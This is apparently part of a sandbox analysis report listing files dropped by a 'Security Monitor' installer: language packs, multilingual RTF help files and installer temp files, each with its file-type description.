Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-055CD.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2840L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2JHGD.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-755HF.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-84SMN.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-8DDEN.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-CK6BI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-GBT98.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-GT9M6.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-IMVBV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-IPDVF.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-L0R1U.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-M76VA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-R2ENR.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-RSBIE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VA13R.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VNPO6.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0SJ1D.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-3TP1I.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-F7B50.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H1SI6.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-JD3B3.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-KEH7S.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-LQVAK.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-T4VK4.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-UIIES.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-UPP80.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-V01VP.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-V34TP.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-01QFC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-20UUV.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-3KKNH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-46I3M.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6C96I.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7VGL5.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-8D00G.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-COEKT.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-DGK86.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-EUMJL.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-FGGGB.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-G8N1U.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JJU8V.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JM4HO.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JMQT3.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-MQ22E.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-PKRPV.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-1A2EE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2HJ9K.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-355LD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-99351.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-9JQBQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-D5R10.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-FJM39.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GJ503.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-HCDHQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JIB0U.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JQOEF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LB8CH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LIAVF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-Q5JCQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-QNL0J.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-T703I.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-UAI05.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0AFEM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-11PFK.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1354A.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-331R5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-6DBRC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-7CNLB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-7UTBH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-96I5E.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-9B0OH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-ARS9D.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-C863T.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D3BUF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D3F9Q.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-DDEPE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-E8DF2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-HH2CV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-JBO5T.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-KPRD8.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-KPTAM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NFB9T.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
